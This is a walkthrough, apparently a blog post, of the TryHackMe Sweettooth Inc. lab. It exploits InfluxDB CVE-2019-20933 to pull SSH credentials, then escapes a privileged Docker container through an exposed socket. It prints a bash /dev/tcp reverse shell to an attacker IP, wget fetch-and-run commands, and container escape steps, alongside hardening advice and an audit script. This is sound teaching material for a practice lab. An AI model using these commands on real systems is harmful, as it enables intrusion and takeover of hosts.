TryHackMe Sweettooth Inc. Writeup

Shivam Taneja
Oct 31, 2022

Sweettooth Inc. Writeup

This writeup will help you solve the Sweettooth Inc. box on TryHackMe. Before we start enumerating the box, add the following line to your /etc/hosts file (writing to /etc/hosts requires root, so run it with sudo or from a root shell):

echo "<box_ip> sweettooth.thm" >> /etc/hosts

Enumeration

As usual, we start with an nmap port scan of the host. The -sC flag runs nmap's default script set (banner grabbing, SSH host keys, rpcinfo and similar checks; it is not a vulnerability scan), and -sV probes each open port for version information.

nmap -sV -sC sweettooth.thm

You can read the output below:

PORT     STATE SERVICE REASON  VERSION
111/tcp  open  rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4       111/tcp   rpcbind
|   100000  2,3,4       111/udp   rpcbind
|   100000  3,4         111/tcp6  rpcbind
|   100000  3,4         111/udp6  rpcbind
|   100024  1         36179/tcp6  status
|   100024  1         42728/tcp   status
|   100024  1         49696/udp   status
|_  100024  1         58848/udp6  status
2222/tcp open  ssh     syn-ack OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
|   1024 b0:ce:c9:21:65:89:94:52:76:48:ce:d8:c8:fc:d4:ec (DSA)
| ssh-dss [key omitted]
|   2048 7e:86:88:fe:42:4e:94:48:0a:aa:da:ab:34:61:3c:6e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCbBmLBPg9mxkAdEbJGnz0v6Jzo4qdBcajkaIBKewKyz6OQTvyhVcDReSB2Dz0nl4mPCs3UN58hSNStCYXjZcpIBpqz2pHupVlqQ7u41Vo2W8u0nVFLt2U8JhTtA9wE6MA9GhitkN3Qorhxb3klCpSnWCDdcmkdNL0EYxZV53A52VWiNGX3vYkdMAKHAmp/VHvrsIeHozqflL8vD2UIoDmxDJwgXJRsr2iGVU1fL/Bu/DwlPwJkm50ua99yPpZbvCS9EwWki76aEtZSbcM4WHzx33Oe3tLXLCfKc9CJdIW35nBvpe5Dxl7gLR/mCHp2iTpdx1FmpSf+JjO/m2vKwL4X
|   256 04:1c:82:f6:a6:74:53:c9:c4:6f:25:37:4c:bf:8b:a8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHufHfqIZHVEKYC/yyNS+vTt35iULiIWoFNSQP/Bm/v90QzZjsYU9MSt7xdlR/2LZp9VWk32nl5JL65tvCMImxc=
|   256 49:4b:dc:e6:04:07:b6:d5:ab:c0:b0:a3:42:8e:87:b5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJEYHtE8GbpGSlNB+/3IWfYRFrkJB+N9SmKs3Uh14pPj
8086/tcp open  http    syn-ack InfluxDB http admin 1.3.0
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are three open ports. Port 111 serves rpcbind and port 2222 serves SSH (OpenSSH 6.7p1, an old Debian 8 build). The most interesting one is 8086, which serves InfluxDB 1.3.0, a time-series database with an HTTP API. Let's enumerate this service first.

InfluxDB enumeration

The first task is to find a valid username. InfluxDB 1.x exposes a /debug/requests endpoint that lists recent write and query activity keyed by username and client address, and on this box it is reachable without any authentication. Browsing to http://sweettooth.thm:8086/debug/requests returns the following JSON response:

{
  "REDACTED:127.0.0.1": {"writes":2,"queries":2}
}

Now that we have the username, we can try to read data from the database. Searching for InfluxDB vulnerabilities turned up the following exploit for CVE-2019-20933, an authentication bypass in InfluxDB 1.x (fixed in 1.7.6) that lets anyone who knows a valid username query the database. Run the following commands to install the exploit tool:

git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git
cd InfluxDB-Exploit-CVE-2019-20933
python3 -m pip install -r requirements.txt

Now run python3 __main__.py to start the tool. It asks for the IP address and port of the box and for the username we just found. With correct input, you should see the following output:

Databases list:
1) creds
2) docker
3) tanks
4) mixer
5) _internal
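For the defender's side of this finding: the bypass used above works because the server answers requests without credentials and, in versions affected by CVE-2019-20933, accepts a JWT signed with an empty shared secret. The fragment below is an added example of the relevant [http] section of an InfluxDB 1.x influxdb.conf, not a file taken from the box; the weak settings are shown commented out beside the hardened ones, and REPLACE_WITH_RANDOM_SECRET is a placeholder.

```toml
[http]
  # Weak (what this box effectively runs): every request is accepted without
  # credentials, and with no shared secret a JWT signed with an empty key is
  # accepted by vulnerable releases.
  # auth-enabled  = false
  # shared-secret = ""
  # pprof-enabled = true

  # Hardened: require credentials on every request and set a long random
  # secret so that JWTs must be signed with it. pprof-enabled only controls the
  # /debug/pprof profiling endpoints, which have no business being public.
  auth-enabled  = true
  shared-secret = "REPLACE_WITH_RANDOM_SECRET"
  pprof-enabled = false
```

Configuration alone is not enough on 1.3.0: upgrade to 1.7.6 or later, where the bypass is fixed, and after turning on auth-enabled create an administrative user (CREATE USER admin WITH PASSWORD '...' WITH ALL PRIVILEGES), since InfluxDB refuses all queries once authentication is required and no users exist.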

Run use DATABASE_NAME to select a database, and show measurements to list its tables (InfluxDB calls them measurements). To find the temperature of the water tank at 1621346400 (a UTC Unix timestamp), we need all the data from the tanks database. Run the following commands:

tanks
show measurements
select * from water_tank;

This returns the water tank readings for many timestamps. An epoch converter shows that 1621346400 is the 18th of May at 14:00 UTC. Look for the entry with that time in the output:

"2022-10-18T14:00:00Z",
93.47,
REDACTED
],

Now that we have the water temperature, the next question is the highest RPM the mixer reached. Run the following commands:

exit
mixer
show measurements
select * from mixer_stats
select max(motor_rpm) from mixer_stats

You can see the output below:

"values": [
  [
    "2021-05-20T15:00:00Z",
    REDACTED
  ]
]

User Flag

Now on to the real work: finding credentials in this database. There was a creds database, so let's check its contents. Run the following commands:

exit
creds
show measurements
select * from ssh

You can find the output below:

{
  "results": [
    {
      "series": [
        {
          "columns": [
            "time",
            "pw",
            "user"
          ],
          "name": "ssh",
          "values": [
            [
              "2022-10-16T12:00:00Z",
              REDACTED_PASSWORD,
              "REDACTED_USERNAME"
            ]
          ]
        }
      ],
      "statement_id": 0
    }
  ]
}

Now you can log into the server using SSH. To do so, run:

ssh -p 2222 REDACTED_USER@sweettooth.thm

You can find the user.txt flag in the /home/REDACTED_USER directory.

Root Flag

With user.txt in hand, let's go for root.txt. Running linpeas.sh turned up an interesting file: /var/run/docker.sock, the Docker daemon's control socket, which is writable by the current user (write access to that socket is effectively root on the host). Checking the running processes with ps aux also shows that the Docker socket is exposed over TCP port 8080 by a socat process. Here is the relevant line of ps aux:

socat TCP-LISTEN:8080,reuseaddr,fork UNIX-CLIENT:/var/run/docker.sock

Now we can use SSH to forward port 8080 to our attacking machine so we can talk to the Docker API and inspect the running container. Run the following command on your attacking machine:

ssh -p 2222 uzJk6Ry98d8C@sweettooth.thm -L 8080:localhost:8080

Enter the password of the uzJk6Ry98d8C user. Browsing to http://localhost:8080/containers/json (the Docker API's container listing) shows a container named sweettoothinc. We can use this name to execute commands inside the container with the Docker CLI. Create a reverse shell script on your attacking machine with the following content (stdin must be redirected as well, otherwise the shell receives no input):

bash -i >& /dev/tcp/ATTACKING_IP/9001 0>&1

Save this file as shell.sh, the name the commands below expect. On your attacking machine, run python3 -m http.server to serve it on port 8000. To catch the reverse shell, run the following command in a second terminal on your attacking machine:

nc -lvnp 9001

Download the file into the container and run it with the following snippet (the -H option points the Docker CLI at the forwarded socket):

docker -H localhost:8080 container exec sweettoothinc wget http://10.9.5.154:8000/shell.sh
docker -H localhost:8080 container exec sweettoothinc chmod +x shell.sh
docker -H localhost:8080 container exec sweettoothinc bash -i shell.sh

Go back to your netcat listener, run passwd, and enter obz twice when prompted:

passwd
obz
obz

After logging in as the uzJk6Ry98d8C user, you should now be able to change to the root user by running:

su root

Enter the obz password, and you should now be root within the docker container. You can find the root.txt flag at /root/root.txt.

Escape!

The last part of this box consists of escaping the docker container. Run the following command to list the block devices visible from inside the container and find a disk to mount:

fdisk -l

You can see the output below:

/dev/xvda1 *     2048 32088063 32086016 15.3G 83 Linux
/dev/xvda2   32090110 33552383  1462274  714M  5 Extended
/dev/xvda5   32090112 33552383  1462272  714M 82 Linux swap / Solaris

Normally a docker container should not see the host's disks at all; that it does here means the container was started with enough privileges (typically --privileged, or an explicit --device mapping plus the capability to mount) to reach host block devices. Knowing this, we can mount the host's root filesystem inside the container. Run the following commands to mount /dev/xvda1:

mkdir /mnt/linux
mount /dev/xvda1 /mnt/linux

Success! You can find the final root.txt flag which is now located at: /mnt/linux/root/root.txt.
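The two Docker misconfigurations this box relies on, the control socket bridged onto a TCP port (the socat line seen in ps aux) and a container privileged enough to see host disks, are both easy to check for on a host you administer. The script below is an added audit helper, not part of the writeup; the sample process list and docker inspect output are constructed stand-ins, and the helper functions read the same formats from stdin so they can be fed real output.

```sh
#!/bin/sh
# Added audit helper (not from the writeup). Flags Docker control-socket
# exposure over TCP and containers running with HostConfig.Privileged=true.

# Constructed stand-in for `ps -eo args` output.
SAMPLE_PS='/usr/bin/dockerd -H fd://
socat TCP-LISTEN:8080,reuseaddr,fork UNIX-CLIENT:/var/run/docker.sock
/usr/sbin/sshd -D
bash'

# Constructed stand-in for
#   docker ps -q | xargs docker inspect --format '{{.Name}} {{.HostConfig.Privileged}}'
# Docker prints container names with a leading slash; it is stripped below.
SAMPLE_INSPECT='/sweettoothinc true
/web false'

# Count process command lines that both listen on a TCP port and talk to
# docker.sock (socat, ncat and similar forwarders all mention "listen").
# Prints the count; 0 is the good case (grep -c then exits non-zero).
socket_over_tcp() {
  grep -i 'listen' | grep -c 'docker\.sock'
}

# Print the names of containers whose HostConfig.Privileged is true.
privileged_containers() {
  sed 's#^/##' | awk '$2 == "true" { print $1 }'
}

# Mode and owner of the socket; on a sane host this is 660 root:docker.
# Uses GNU stat -c; BSD stat needs different flags.
socket_perms() {
  stat -c '%a %U:%G' "${1:-/var/run/docker.sock}" 2>/dev/null
}

echo "docker.sock forwarded over TCP by $(printf '%s\n' "$SAMPLE_PS" | socket_over_tcp) process(es)"
echo "privileged containers: $(printf '%s\n' "$SAMPLE_INSPECT" | privileged_containers | tr '\n' ' ')"
```

On a live host, feed the functions real data: `ps -eo args | socket_over_tcp` and `docker ps -q | xargs docker inspect --format '{{.Name}} {{.HostConfig.Privileged}}' | privileged_containers`, plus `socket_perms` to confirm the socket is not world-writable. Anyone who can write to docker.sock, directly or through a forwarder like the one on this box, can start a privileged container with the host filesystem mounted, which is exactly the escape shown above, so membership of the docker group should be treated as root access.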

This box was interesting to root. Keep your software up to date (the InfluxDB bypass used here was fixed in 1.7.6), and if you run docker containers, make sure they are configured securely: don't expose the Docker socket over the network or make it writable to unprivileged users, and don't run containers with --privileged unless they truly need it. Docker's defaults are already stricter than what this box runs.



Written by Shivam Taneja

IT Security Consultant, Researcher, Penetration Tester & Hacker.
